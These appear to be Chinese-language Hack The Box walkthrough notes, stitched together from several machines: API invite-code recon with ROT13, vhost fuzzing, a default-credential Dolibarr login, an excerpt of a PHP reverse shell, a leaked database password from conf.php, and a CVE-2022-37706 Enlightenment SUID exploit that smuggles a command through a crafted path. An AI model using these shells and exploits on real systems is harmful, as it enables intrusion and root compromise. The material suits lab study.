curl http://2million.htb/api/v1/invite/how/to/generate -X POST
得到
1
{"0":200,"success":1,"data":{"data":"Va beqre gb trarengr gur vaivgr pbqr, znxr n CBFG erdhrfg gb \/ncv\/i1\/vaivgr\/trarengr","enctype":"ROT13"},"hint":"Data is encrypted ... We should probbably check the encryption type in order to decrypt it..."}
直接 CyberChef 解 ROT13 得到 In order to generate the invite code, make a POST request to /api/v1/invite/generate。 好吧,改个 PATH,再 POST 一下,得到
v1 user GET /api/v1 "Route List" /api/v1/invite/how/to/generate "Instructions on invite code generation" /api/v1/invite/generate "Generate invite code" /api/v1/invite/verify "Verify invite code" /api/v1/user/auth "Check if user is authenticated" /api/v1/user/vpn/generate "Generate a new VPN configuration" /api/v1/user/vpn/regenerate "Regenerate VPN configuration" /api/v1/user/vpn/download "Download OVPN file" POST /api/v1/user/register "Register a new user" /api/v1/user/login "Login with existing user" admin GET /api/v1/admin/auth "Check if user is admin" POST /api/v1/admin/vpn/generate "Generate VPN for specific user" PUT /api/v1/admin/settings/update "Update user settings"
PORT STATE SERVICE 25/tcp open smtp 80/tcp open http 110/tcp open pop3 135/tcp open msrpc 139/tcp open netbios-ssn 143/tcp open imap 445/tcp open microsoft-ds 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 5040/tcp open unknown 5985/tcp open wsman 7680/tcp open pando-pub 47001/tcp open winrm 49664/tcp open unknown 49665/tcp open unknown 49666/tcp open unknown 49667/tcp open unknown 49668/tcp open unknown 50304/tcp open unknown
--hw 1053 是过滤掉 1053 字节的响应。 扫到一个 crm.board.htb。 加入 /etc/hosts 里,访问到是一个 Dolibarr 的登录页面,随手敲个 admin admin 竟然登上去了,乐。 新建一个 website,再在里面新建一个 Page,编辑 HTML 源,写 PHP,保存会报 You add dynamic PHP code that contains the PHP instruction 'system' that is forbidden by default as dynamic content (see hidden options WEBSITE_PHP_ALLOW_xxx to increase list of allowed commands).
if (function_exists('pcntl_fork')) { $pid = pcntl_fork(); if ($pid == -1) { printit("ERROR: Can't fork"); exit(1); } if ($pid) { exit(0); // Parent exits } if (posix_setsid() == -1) { printit("Error: Can't setsid()"); exit(1); }
$daemon = 1; } else { printit("WARNING: Failed to daemonise. This is quite common and not fatal."); }
chdir("/");
umask(0);
// Open reverse connection $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); }
$descriptorspec = array( 0 => array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("pipe", "w") // stderr is a pipe that the child will write to );
<?php // // File generated by Dolibarr installer 17.0.0 on May 13, 2024 // // Take a look at conf.php.example file for an example of conf.php file // and explanations for all possibles parameters. // $dolibarr_main_url_root='http://crm.board.htb'; $dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs'; $dolibarr_main_url_root_alt='/custom'; $dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom'; $dolibarr_main_data_root='/var/www/html/crm.board.htb/documents'; $dolibarr_main_db_host='localhost'; $dolibarr_main_db_port='3306'; $dolibarr_main_db_name='dolibarr'; $dolibarr_main_db_prefix='llx_'; $dolibarr_main_db_user='dolibarrowner'; $dolibarr_main_db_pass='serverfun2$2023!!'; $dolibarr_main_db_type='mysqli'; $dolibarr_main_db_character_set='utf8'; $dolibarr_main_db_collation='utf8_unicode_ci'; // Authentication settings $dolibarr_main_authentication='dolibarr';
#!/usr/bin/bash # Idea by MaherAzzouz # Development by nu11secur1ty
echo"CVE-2022-37706" echo"[*] Trying to find the vulnerable SUID file..." echo"[*] This may take few seconds..."
# The actual problem file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1) if [[ -z ${file} ]] then echo"[-] Couldn't find the vulnerable SUID file..." echo"[*] Enlightenment should be installed on your system." exit 1 fi
echo"[+] Vulnerable SUID binary found!" echo"[+] Trying to pop a root shell!" mkdir -p /tmp/net mkdir -p "/dev/../tmp/;/tmp/exploit"
echo"/bin/sh" > /tmp/exploit chmod a+x /tmp/exploit echo"[+] Welcome to the rabbit hole :)"